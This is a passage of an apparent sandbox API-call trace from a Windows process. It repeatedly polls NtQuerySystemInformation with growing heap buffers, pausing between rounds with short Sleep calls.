RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.364] Sleep (dwMilliseconds=0x110) [0238.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.392] Sleep (dwMilliseconds=0x110) [0238.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.406] Sleep (dwMilliseconds=0x110) [0238.446] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.446] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.447] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.455] Sleep (dwMilliseconds=0x110) [0238.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.470] Sleep (dwMilliseconds=0x110) [0238.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.486] Sleep (dwMilliseconds=0x110) [0238.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.526] Sleep (dwMilliseconds=0x110) [0238.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.587] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.594] Sleep (dwMilliseconds=0x110) [0238.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.614] Sleep (dwMilliseconds=0x110) [0238.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.626] Sleep (dwMilliseconds=0x110) [0238.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.649] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.649] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.650] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.650] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.651] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.651] Sleep (dwMilliseconds=0x110) [0238.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.658] Sleep (dwMilliseconds=0x110) [0238.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.677] Sleep (dwMilliseconds=0x110) [0238.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.692] Sleep (dwMilliseconds=0x110) [0238.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 